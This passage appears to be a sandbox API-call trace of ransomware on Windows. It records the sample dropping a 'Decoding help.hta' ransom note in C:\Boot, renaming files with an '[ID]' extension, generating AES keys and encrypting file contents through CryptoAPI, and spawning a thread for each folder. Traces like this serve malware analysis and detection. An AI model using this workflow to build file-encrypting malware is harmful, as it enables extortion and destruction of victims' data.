returned 1 [0038.493] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0038.493] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0038.493] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0038.493] lstrcmpW (lpString1=".", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0038.493] lstrcmpW (lpString1="..", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0038.493] lstrcmpiW (lpString1="windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0038.493] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\$Recycle.Bin\\*.*" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\*.*") returned="\\\\?\\C:\\$Recycle.Bin\\*.*" [0038.493] lstrlenW (lpString="\\\\?\\C:\\$Recycle.Bin\\*.*") returned 23 [0038.493] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin\\", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0038.493] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*" [0038.493] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ebdc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1bc [0038.499] CloseHandle (hObject=0x1bc) returned 1 [0038.499] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0038.499] FindClose (in: hFindFile=0x5a52b0 | out: hFindFile=0x5a52b0) returned 1 Thread: id = 12 os_tid = 0xa64 [0038.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*.*", lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0038.494] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0038.494] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.495] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0038.495] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0038.495] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0038.495] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.495] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.495] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\Decoding help.hta" [0038.495] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Decoding help.hta" (normalized: "c:\\boot\\decoding help.hta")) returned 0xffffffff [0038.495] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Decoding help.hta" (normalized: "c:\\boot\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0038.495] WriteFile (in: hFile=0x1b8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x30cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x30cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0038.496] CloseHandle (hObject=0x1b8) returned 1 [0038.496] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0038.496] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BCD") returned 1 [0038.496] lstrlenW (lpString="BCD") returned 3 [0038.497] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.497] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.497] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="BCD" | out: lpString1="\\\\?\\C:\\Boot\\BCD") returned="\\\\?\\C:\\Boot\\BCD" [0038.497] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\BCD" | out: lpString1="\\\\?\\C:\\Boot\\BCD") returned="\\\\?\\C:\\Boot\\BCD" [0038.497] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\BCD", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\BCD.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\BCD.[ID]g9uZrLhJaygpwRm1[ID]" [0038.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\bcd.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0038.497] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0038.497] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.497] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.497] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\Decoding help.hta" [0038.497] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Decoding help.hta" (normalized: "c:\\boot\\decoding help.hta")) returned 0x1 [0038.497] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BCD.LOG") returned 1 [0038.497] lstrlenW (lpString="BCD.LOG") returned 7 [0038.497] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.497] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.497] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="BCD.LOG" | out: lpString1="\\\\?\\C:\\Boot\\BCD.LOG") returned="\\\\?\\C:\\Boot\\BCD.LOG" [0038.497] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\BCD.LOG" | out: lpString1="\\\\?\\C:\\Boot\\BCD.LOG") returned="\\\\?\\C:\\Boot\\BCD.LOG" [0038.497] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\BCD.LOG", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\BCD.LOG.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\BCD.LOG.[ID]g9uZrLhJaygpwRm1[ID]" [0038.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\bcd.log.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0038.497] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0038.497] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.497] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.497] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\Decoding help.hta" [0038.497] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Decoding help.hta" (normalized: "c:\\boot\\decoding help.hta")) returned 0x1 [0038.498] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0038.498] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.498] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.498] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\Decoding help.hta" [0038.498] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Decoding help.hta" (normalized: "c:\\boot\\decoding help.hta")) returned 0x1 [0038.498] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0038.498] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.498] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.498] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\Decoding help.hta" [0038.498] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Decoding help.hta" (normalized: "c:\\boot\\decoding help.hta")) returned 0x1 [0038.498] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BOOTSTAT.DAT") returned 1 [0038.498] lstrlenW (lpString="BOOTSTAT.DAT") returned 12 [0038.498] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.498] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.498] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="BOOTSTAT.DAT" | out: lpString1="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" [0038.498] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" | out: lpString1="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" [0038.498] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\BOOTSTAT.DAT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.[ID]g9uZrLhJaygpwRm1[ID]" [0038.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\bootstat.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0038.503] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\bootstat.dat.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0038.503] CreateFileMappingA (hFile=0x1c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1bc [0038.503] CryptAcquireContextA (in: phProv=0x30cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x30cfcec*=0x5a7c68) returned 1 [0038.504] CryptGenKey (in: hProv=0x5a7c68, Algid=0x6610, dwFlags=0x1, phKey=0x30cfce8 | out: phKey=0x30cfce8*=0x5a5330) returned 1 [0038.504] CryptExportKey (in: hKey=0x5a5330, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x30cfbe4, pdwDataLen=0x30cfce4 | out: pbData=0x30cfbe4*, pdwDataLen=0x30cfce4*=0x2c) returned 1 [0038.504] MapViewOfFile (hFileMappingObject=0x1bc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10000) returned 0x2d0000 [0038.510] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30cfbe4*, pdwDataLen=0x30cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x30cfbe4*, pdwDataLen=0x30cfcf8*=0x100) returned 1 [0038.510] CryptEncrypt (in: hKey=0x5a5330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0x30cfce4*=0x10000, dwBufLen=0x10000 | out: pbData=0x2d0000*, pdwDataLen=0x30cfce4*=0x10000) returned 1 [0038.515] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0038.516] CloseHandle (hObject=0x1bc) returned 1 [0038.516] CryptDestroyKey (hKey=0x5a5330) returned 1 [0038.516] CryptReleaseContext (hProv=0x5a7c68, dwFlags=0x0) returned 1 [0038.516] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.516] WriteFile (in: hFile=0x1c4, lpBuffer=0x30cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x30cfbe4*, lpNumberOfBytesWritten=0x30cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0038.517] WriteFile (in: hFile=0x1c4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x30cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x30cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0038.517] CloseHandle (hObject=0x1c4) returned 1 [0038.518] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0038.519] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0038.519] lstrcmpW (lpString1=".", lpString2="cs-CZ") returned -1 [0038.519] lstrcmpW (lpString1="..", lpString2="cs-CZ") returned -1 [0038.519] lstrcmpiW (lpString1="windows", lpString2="cs-CZ") returned 1 [0038.519] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.519] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.519] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="cs-CZ" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ") returned="\\\\?\\C:\\Boot\\cs-CZ" [0038.519] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\cs-CZ", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\*.*") returned="\\\\?\\C:\\Boot\\cs-CZ\\*.*" [0038.519] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3350048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.521] CloseHandle (hObject=0x1c4) returned 1 [0038.521] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0038.521] lstrcmpW (lpString1=".", lpString2="da-DK") returned -1 [0038.521] lstrcmpW (lpString1="..", lpString2="da-DK") returned -1 [0038.521] lstrcmpiW (lpString1="windows", lpString2="da-DK") returned 1 [0038.521] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.521] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.521] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="da-DK" | out: lpString1="\\\\?\\C:\\Boot\\da-DK") returned="\\\\?\\C:\\Boot\\da-DK" [0038.521] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\da-DK", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\da-DK\\*.*") returned="\\\\?\\C:\\Boot\\da-DK\\*.*" [0038.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x33680b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.535] CloseHandle (hObject=0x1c4) returned 1 [0038.535] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0038.535] lstrcmpW (lpString1=".", lpString2="de-DE") returned -1 [0038.535] lstrcmpW (lpString1="..", lpString2="de-DE") returned -1 [0038.535] lstrcmpiW (lpString1="windows", lpString2="de-DE") returned 1 [0038.536] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.536] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.536] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="de-DE" | out: lpString1="\\\\?\\C:\\Boot\\de-DE") returned="\\\\?\\C:\\Boot\\de-DE" [0038.536] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\de-DE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\de-DE\\*.*") returned="\\\\?\\C:\\Boot\\de-DE\\*.*" [0038.536] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3410388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.553] CloseHandle (hObject=0x1c4) returned 1 [0038.553] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0038.553] lstrcmpW (lpString1=".", lpString2="el-GR") returned -1 [0038.553] lstrcmpW (lpString1="..", lpString2="el-GR") returned -1 [0038.553] lstrcmpiW (lpString1="windows", lpString2="el-GR") returned 1 [0038.554] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.554] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.554] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="el-GR" | out: lpString1="\\\\?\\C:\\Boot\\el-GR") returned="\\\\?\\C:\\Boot\\el-GR" [0038.554] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\el-GR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\el-GR\\*.*") returned="\\\\?\\C:\\Boot\\el-GR\\*.*" [0038.554] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x40e80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.562] CloseHandle (hObject=0x1c4) returned 1 [0038.562] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0038.562] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0038.562] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0038.562] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0038.563] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\*.*") returned="\\\\?\\C:\\Boot\\*.*" [0038.563] lstrlenW (lpString="\\\\?\\C:\\Boot\\*.*") returned 15 [0038.563] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Boot\\en-US") returned="\\\\?\\C:\\Boot\\en-US" [0038.563] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\*.*") returned="\\\\?\\C:\\Boot\\en-US\\*.*" [0038.563] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4148250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0038.588] CloseHandle (hObject=0x1c4) returned 1 [0038.588] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x30cfd30 | out: lpFindFileData=0x30cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, 